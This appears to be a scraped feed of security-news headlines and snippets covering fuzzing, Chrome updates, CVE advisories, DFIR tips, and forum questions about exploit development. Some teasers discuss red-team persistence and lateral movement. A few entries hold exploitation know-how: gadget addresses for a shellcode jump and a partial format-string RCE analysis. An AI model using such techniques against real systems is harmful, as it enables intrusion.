    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…  ( 7 min )
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Observing Attacks Against Hundreds of Exposed Services in Public Clouds
    Insecurely exposed services are common misconfigurations in cloud environments. We used a honeypot infrastructure to learn about attacks against them. The post Observing Attacks Against Hundreds of Exposed Services in Public Clouds appeared first on Unit42.
  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs Continue reading on Medium »
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice… Continue reading on Medium »  ( 5 min )
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi , I am beginner to Vulnerability research. Have some experience in ctf and exploit challenges. The problem that I am facing challenges while auditing code either in c/c++ or Assembly manually. I missed many points while searching potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing c++ developed binary in IDA . So I want to know some advice or any tutorials or books to achieve them . Also in windbg crash let’s say there is a crash happened. How to determine which classes of vulnerability it is. .please let me know guys . Thanks. submitted by /u/crypt3r [link] [comments]  ( 2 min )

  • Open

    The "serial offender" #sexually assaulted an innocent minor girl and fled the scene.
    #Sexually assaulted an innocent minor #girl Continue reading on Medium »  ( 1 min )

  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset? gdb-peda$ jmp esp 0x40061e : jmp rsp 0x400743 : call rsp 0x60061e : jmp rsp 0x600743 : call rsp submitted by /u/Bahariasaurus [link] [comments]  ( 2 min )
  • Open

    【安全通报】Metabase 敏感信息泄露漏洞(CVE-2021-41277)
    近日,metabase 爆出敏感信息泄露漏洞,该漏洞 CVSS3 评分高达 9.9。攻击者可在未经身份验证的情况下获取系统敏感信息。
  • Open

    【安全通报】Metabase 敏感信息泄露漏洞(CVE-2021-41277)
    近日,metabase 爆出敏感信息泄露漏洞,该漏洞 CVSS3 评分高达 9.9。攻击者可在未经身份验证的情况下获取系统敏感信息。

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    [译] [论文] 可虚拟化第三代(计算机)架构的规范化条件(ACM, 1974)
    译者序 本文翻译自 1974 年关于可虚拟化计算机架构(即能支持 VM)的经典 论文: Popek, Gerald J., and Robert P. Goldberg. "Formal requirements for virtualizable third generation architectures." Communications of the ACM 17.7 (1974): 412-421. 虽然距今已半个世纪,但这篇文章的一些核心思想仍未过时。特别是,它在最朴素的层面 介绍了虚拟机是如何工作的(就像 (译) RFC 1180:朴素 TCP/IP 教程(1991) 在最朴素的层面介绍 TCP/IP 是如何工作的一样,虽然本文更晦涩一些),这些内容对理解虚拟化的底层原理有很大帮助。 第 1~4 代计算机架构的介绍可参考 Evolution of Computers from First Generation to Fourth Generation: 第一代:1940 – 1958 第二代:1958 – 1964 第三代:1964 ~ 1974,特点: 使用集成电路取代晶体管 High-level 编程语言 磁质存储 第四代:1974 ~ 今 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1. 虚拟机概念(Virtual Machine Concepts) 1.1 虚拟机(VM)和虚拟机监督器(VMM) 1.2 VMM 特点 1.2.1 一致性:程序在 VM 中执行与在真实机器上执行结果相同 1.2.2 高效性:大部分 VM 指令直接在硬件上执行 1.2.3 完全控制系统资源 1.3 虚拟机(VM)的定义 2. 一种第三代计算机模型(A Model of Third Generation M…

  • Open

    Simplified Storage Controls
    Posted by Theodore Olsauskas-Warren At Chrome, we’re always looking for ways to help users better understand and manage privacy on the web. Our most recent change provides more clarity on controlling site storage settings. Starting today, we will be rolling out this change to M97 Beta, we will be re-configuring our Privacy and Security settings related to data a site can store (e.g. cookies). Users can now delete all data stored by an individual site by navigating to Settings > Privacy and Security > Site Settings > View permissions and data stored across files, where they’ll land on chrome://settings/content/all. We will be removing the more granular controls found when navigating to Settings > Privacy and Security > Cookies and other site data > See all cookies and site data at chrome:/…
    Chrome 97: WebTransport, New Array Static Methods and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links. Chrome 97 is beta as of November 18, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. For more information, see Force Chrome major version to 100 in the User-Agent string. Features in this Release Auto-expand D…
  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploitdev or vulnerability research. I am not looking for any revenue I just need a practical experience. Is there a way to find an internship in such a field as non-american? submitted by /u/botta633 [link] [comments]  ( 1 min )
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and i know that The Shellcoder’s Handbook is recommended but does it still hold up in 2021? submitted by /u/milkshakemahn [link] [comments]  ( 1 min )

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2...
    近日,Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。  ( 1 min )
  • Open

    【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2...
    近日,Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。  ( 1 min )
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )

  • Open

    【安全通报】Hadoop Yarn RPC服务未授权访问漏洞
    近日,网络上出现 Hadoop Yarn RPC 服务未授权访问漏洞的在野利用事件,攻击者可在未经过身份验证的情况下通过该漏洞在影响主机执行任意命令。  ( 1 min )
  • Open

    【安全通报】Hadoop Yarn RPC服务未授权访问漏洞
    近日,网络上出现 Hadoop Yarn RPC 服务未授权访问漏洞的在野利用事件,攻击者可在未经过身份验证的情况下通过该漏洞在影响主机执行任意命令。  ( 1 min )
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Partitioning Chrome's Code for Faster Launch Times on Android
    Mobile devices are generally more resource constrained than laptops or desktops. Optimizing Chrome’s resource usage is critical to give mobile users a faster Chrome experience. As we’ve added features to Chrome on Android, the amount of Java code packaged in the app has continued to grow. In this The Fast and the Curious post we show how our team improved the speed and memory usage of Chrome on Android with Isolated Splits. With these improvements, Chrome on Android now uses 5-7% less memory, and starts and loads pages even faster than before. The Problem For Android apps (including Chrome on Android), compiled Java code is stored in .dex files. The user's experience in Chrome on Android is particularly sensitive to increases in .dex size due to its multi-process architecture. On Android,…
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22  ( 3 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio [link] [comments]

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local bsides. I then was able to present at IEEE southeastcon, which got me a job as a security engineer before graduating. -----‐ 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) should I go the pentester route and then exploit dev? 3) do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in powershell, python, and recently, go. I know C but hardly. 4) should I just shaddup and start learning? I'd assume that's get a better grip on primitives, RoP and C. submitted by /u/xnrkl [link] [comments]  ( 3 min )
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0  ( 2 min )

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3  ( 3 min )
  • Open

    【安全通报】PAN GlobalProtect Portal 内存损坏漏洞(CVE-...
    近日,Palo Alto Networks (PAN) 发布安全公告,修复了Palo Alto Networks GlobalProtect portal 和 gateway interfaces 中的内存损坏漏洞。未经身份验证的攻击...  ( 1 min )
  • Open

    【安全通报】PAN GlobalProtect Portal 内存损坏漏洞(CVE-...
    近日,Palo Alto Networks (PAN) 发布安全公告,修复了Palo Alto Networks GlobalProtect portal 和 gateway interfaces 中的内存损坏漏洞。未经身份验证的攻击...  ( 1 min )

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0  ( 2 min )

  • Open

    Chrome Dev Summit 2021: Moving toward a more powerful and private web
    By Paul Kinlan, Lead for Chrome Developer Relations The big day is finally here. Today, at Chrome Dev Summit 2021 we shared some of the highlights of what we've been working on — the latest product updates, vision for the web's future and examples of best-in-class web experiences. Over the past year, we've also had a lot of feedback that you want to spend more time learning from and working with the Chrome team and other industry experts. I'm excited to share with you that we've opened up a lot of spaces for 1:1 office hours, workshops and learning lounges to give you more opportunity to connect with the Chrome team. It's been a busy year for us all and with the continued shift of people moving more of their lives online, it has been more important than ever for us to continue investing …

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )
  • Open

    Run on OS Login
    Users want frequently used applications such as Email, Chat, and other productivity apps to automatically start when they log in to their devices. Auto-starting these apps at login streamlines the user experience as users don't have to manually start apps after logging into their devices. Windows, Mac, and Linux devices allow users to configure native apps to be launched automatically on startup. In Chrome 91, we introduced the Run on OS Login feature. With the launch of this feature, users can now configure desktop web apps to launch automatically when they log-in to the device on Windows, Mac, and Linux devices. Installed apps will not be permitted to automatically enable themselves to run when the user logs in. A manual user gesture will always be required. To configure apps to run on OS login, open Chrome browser. Navigate to chrome://apps or click the ‘Apps' icon in your bookmark bar (example below). To configure an app to start at login, first right click on it. From the context menu, select ‘Start app when you sign in' and you are all set. Next time when you log in to your device, the app will automatically launch on its own. To disable this feature for an app, navigate to chrome://apps. Right click on the app to bring up the context menu and deselect the option, ‘Start app when you sign in'. Apps launched through Run on OS Login are launched only after the device is running. ‘Run on OS Login' is a browser only feature and doesn't expose any launch source information to app developers. We're continuously improving the web platform to provide safe, low friction ways for users to get their day-to-day tasks done. Support for running installed web apps on OS login is a small but significant step to simplifying the startup routine for users that want apps like chat, email, or calendar clients to start as soon as they turn on their computer. As always, we're looking forward to your feedback. Your input will help us prioritize next steps! Posted by Pratyush Sinha

  • Open

    Searching, browsing, and shutdown Chrome performance improvements
    Chrome has long-term investments in performance improvement across many projects and we are pleased to share improvements across speed, memory, and unexpected hangs in today’s The Fast and the Curious series post. One in six searches is now as fast as a blink of an eye, Chrome OS browsing now uses up to 20% less memory thanks to our PartitionAlloc investment, and we’ve resolved some thorny Chrome OS and Windows shutdown experiences. Omnibox You’ve probably noticed that potential queries are suggested to you as you type when you’re searching the web using Chrome’s omnibox (as long as the “Autocomplete searches and URLs” feature is turned on in Chrome settings.) This makes searching for information faster and easier, as you don’t have to type in the entire search query -- once you’ve entered…
  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …  ( 6 min )

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )
  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )
  • Open

    某mpv播放器因格式化字符串导致远程代码执行漏洞深入分析(CVE-2021-30145)
    一、背景介绍 mpv项目是开源项目,可以在多个系统包括Windows、Linux、MacOs上运行,是一款流行的视频播放器,mpv软件在读取文件名称时存在格式化字符串漏洞,可以导致堆溢出并执行任意代码。 二、环境搭建 系统环境为Ubuntu x64位,软件环境可以通过两种方式搭建环境。 1. 通过源码编译,源码地址为:https://github.com/mpv-player/mpv/tree/v0.33.0 下载地址为:https://github.com/mpv-player/mpv/archive/refs/tags/v0.33.0.zip 2. 直接安装安装包,安装后没有符号,调试不方便,可以使用以下三条命令来安装软件: sudo add-apt-repository  ppa:mc3man/mpv-tests sudo apt-get update sudo apt-get install mpv 参考https://blog.csdn.net/qq_34626094/article/details/113122032 安装完成后运行软件如下所示: 三、漏洞复现 源代码: demux_mf.c文件中154行存在对sprintf函数的调用,sprintf函数是格式化字符串函数,参数1是目标缓冲区,参数2是格式化字符串,参数2是可控的,第三个参数是循环次数,mpv程序本身支持文件名中传入一个%,可以使用%d打印这个循环次数,但是由于校验不严格,并没有校验其他的格式化字符串,以及%的个数,所以存在格式化字符串漏洞: 在demux_mf.c文件中127行会检查是否存在%,没有判断有几个%,以及%之后的参数。 程序存在格式化字符串漏洞,使用如下命令运行程序:./mpv …

  • Open

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

  • Open

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

  • Open

    Chrome 96 Beta: Conditional Focus, Priority Hints, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 96 is beta as of October 21, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. Origin Trials This version of Chrome introduces the origin trials described below. Origin…
    Sunsetting the "basic-card" payment method in the Payment Request API
    The Payment Request API is a soon-to-be-recommended web standard that aims to make building low-friction and secure payment flows easier for developers. The browser facilitates the flow between a merchant website and "payment handlers". A payment handler can be built-in to the browser, a native app installed on user’s mobile device, or a Progressive Web App. Today, developers can use the Payment Request API to access several payment methods, including “basic-card” and Google Pay in Chrome on most platforms, Apple Pay in Safari, Digital Goods API on Google Play, and Secure Payment Confirmation in Chrome. Earlier last year, we announced that we will deprecate the "basic-card" payment handler on iOS Chrome, followed by other platforms in the future. The "basic-card" is a payment method that is typically built into the browser to help users easily enter credit card numbers without remembering and typing them. This was designed to make a good transition from a form based credit card payment to an app based tokenized card payment. In order to better pursue the goal of app based payment (and a few other reasons), the Web Payments WG decided to remove it from the specification. Starting from version 96, Chrome will show a warning message in DevTools Console (together with creating a report to Reporting API) when the "basic-card" payment method is used. In version 100, the "basic-card" payment method will be no longer available and canMakePayment() will return false unless other capable payment methods are specified. This applies to all platforms including Android, macOS, Windows, Linux, and Chrome OS. If you are using the Payment Request API with the "basic-card" payment handler, we suggest removing it as soon as possible and using an alternative payment method such as Google Pay or Samsung Pay. Posted by Eiji Kitamura, Developer Advocate on the Chrome team
  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )
  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )
  • Open

    [译] NAT 穿透是如何工作的:技术原理及企业级实践(Tailscale, 2020)
    译者序 本文翻译自 2020 年的一篇英文博客: How NAT traversal works。 设想这样一个问题:在北京和上海各有一台局域网的机器(例如一台是家里的台式机,一 台是连接到星巴克 WiFi 的笔记本),二者都是私网 IP 地址,但可以访问公网, 如何让这两台机器通信呢? 既然二者都能访问公网,那最简单的方式当然是在公网上架设一个中继服务器: 两台机器分别连接到中继服务,后者完成双向转发。这种方式显然有很大的性能开销,而 且中继服务器很容易成为瓶颈。 有没有办法不用中继,让两台机器直接通信呢? 如果有一定的网络和协议基础,就会明白这事儿是可能的。Tailscale 的这篇史诗级长文由浅入深地展示了这种“可能”,如果完全实现本文所 介绍的技术,你将得到一个企业级的 NAT/防火墙穿透工具。 此外,如作者所说,去中心化软件领域中的许多有趣想法,简化之后其实都变成了 跨过公网(互联网)实现端到端直连 这一问题,因此本文的意义并不仅限于 NAT 穿透本身。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 引言 1.1 背景:IPv4 地址短缺,引入 NAT 1.2 需求:两台经过 NAT 的机器建立点对点连接 1.3 方案:NAT 穿透 1.3.1 两个必备前提:UDP + 能直接控制 socket 1.3.2 保底方式:中继 1.4 挑战:有状态防火墙和 NAT 设备 2 穿透防火墙 2.1 有状态防火墙 2.1.1 默认行为(策略) 2.1.2 如何区分入向和出向包 2.2 防火墙朝向(face-off)与穿透方案 2.2.1 防火墙朝向相同 场景特点:服务端 IP 可直接访问 穿透方案:客户端直连服务端,或 hub-and-s…

  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

  • Open

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )
  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

  • Open

    Extending Chrome App Support on Chrome OS
    Posted by Paul Rossman, Technical Program Manager, Chrome Today we're announcing an important update to the previously communicated Chrome app support timeline. Based on feedback from our Enterprise and Education customers and partners, we have made the decision to extend Chrome app support for those users on Chrome OS until at least January 2025.  We continue to invest and have made significant progress in rich new capabilities on the Web platform with Progressive Web Apps (PWA), and we recommend that Chrome app developers migrate to PWAs as soon as possible. PWAs are built and enhanced with modern APIs to deliver enhanced capabilities, reliability, and installability while reaching anyone, anywhere, on any device with a single codebase. There is a growing ecosystem of powerful desktop web apps & PWAs, from advanced graphics products like Adobe Spark to engaging media apps like YouTube TV to productivity and collaboration apps like Zoom. For additional support with Chrome app migration, please visit our Web apps on Chrome OS page. This page will be kept up to date as we progress together through this process. We thank our community of developers who have provided feedback to help us shape this modified and simplified approach. We are inspired by a future beyond Chrome apps, where the ecosystem continues forward progress leveraging open Web standards across all modern browsers.

  • Open

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

  • Open

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

  • Open

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not loosing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

  • Open

    [译] 写给工程师:关于证书(certificate)和公钥基础设施(PKI)的一切(SmallStep, 2018)
    译者序 本文翻译自 2018 年的一篇英文博客: Everything you should know about certificates and PKI but are too afraid to ask, 作者 MIKE MALONE。 这篇长文并不是枯燥、零碎地介绍 PKI、X.509、OID 等概念,而是从前因后果、历史沿革 的角度把这些东西串联起来,逻辑非常清晰,让读者知其然,更知其所以然。 证书和 PKI 的目标其实很简单:将名字关联到公钥(bind names to public keys)。 加密方式的演进: MAC 最早的验证消息是否被篡改的方式,发送消息时附带一段验证码 | 双方共享同一密码,做哈希;最常用的哈希算法:HMAC | \/ Signature 解决 MAC 存在的一些问题;双方不再共享同一密码,而是使用密钥对 | | \/ PKC 公钥加密,或称非对称加密,最常用的一种 Signature 方式 | 公钥给别人,私钥自己留着; | 发送给我的消息:别人用 *我的公钥* 加密;我用我的私钥解密 \/ Certificate 公钥加密的基础,概念:CA/issuer/subject/relying-party/... | 按功能来说,分为两种 | |---用于 *签名*(签发其他证书) 的证书 |---用于 *加解密* 的证书 证书(certificate)相关格式及其关系(沉重的历史负担): 最常用的格式 | 信息比 X.509 更丰富的格式 | 其他格式 mTLS 等常用 Java 常…

  • Open

    RenderingNG: an architecture that makes and keeps Chrome fast for the long term
    Our continual investments in the performance of Chrome have led to significant improvements in battery life, memory, and the speed of the web. This post in The Fast & the Curious series highlights the rendering journey of Chrome over the past eight years, a journey that has led to a browser that is better across the board. For example, Chrome 94, as compared with Chrome 93: is up to 8% more responsive on real pages, saves more than 1400 years of CPU time per day, and improves battery life by up to 0.5% In addition, recent versions of Chrome are much better than those of years past with: 150% or more faster graphics rendering, and greater reliability, due to a 6x reduction in GPU driver crashes on problematic hardware Introduction RenderingNG is a long-term project to systematically imp…

  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )
  • Open

    Fuzzing with Postman
